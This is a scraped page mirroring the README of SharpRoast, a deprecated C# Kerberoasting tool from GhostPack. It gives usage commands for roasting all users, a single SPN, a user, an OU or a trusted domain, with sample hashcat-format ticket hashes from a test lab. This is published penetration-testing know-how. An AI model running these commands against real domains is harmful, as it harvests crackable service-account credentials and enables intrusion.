Become an AceSign inSign up
GhostPack/ SharpRoast
C#
View on GitHub
Need help with SharpRoast?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

GhostPack
223 Stars 71 Forks Other 4 Commits 0 Opened issues

Description

DEPRECATED SharpRoast is a C# port of various PowerView's Kerberoasting functionality.

Services available

!
?

Need anything else?

Contributors list

This project has now been deprecated. Its functionality has been incorporated into Rubeus via the "kerberoast" action, which provides proper ASN.1 structure parsing.

SharpRoast

SharpRoast is a C# port of various PowerView's Kerberoasting functionality. The KerberosRequestorSecurityToken.GetRequest Method() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.

@harmj0y is the primary author of this port.

SharpRoast is licensed under the BSD 3-Clause license.

Usage

Roast all users in the current domain:

C:\Temp>SharpRoast.exe all
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...


SamAccountName         : sqlservice
DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
Hash                   : $krb5tgs$23$$testlab.local$MSSQLSvc/SQL.testlab.local$9994D1...


...

Roast a specific SPN:

C:\Temp>SharpRoast.exe "asdf/asdfasdf"
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast a specific user in the current domain:

C:\Temp>SharpRoast.exe harmj0y
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Roast users from a specified OU in the current domani:

C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName         : testuser2
DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName   : service/host
Hash                   : $krb5tgs$23$*$testlab.local$service/host*$08A6462...

Roast a specific specific SPN in another (trusted) domain:

C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash                   : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...

Roast all users in another (trusted) domain:

C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName         : jason
DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName   : test/test
Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...

Any of these commands also accept a [domain.com\user] [password] for to roast with explicit credentials. For example:

C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName         : harmj0y
DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName   : asdf/asdfasdf
Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

Compile Instructions

We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)

SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.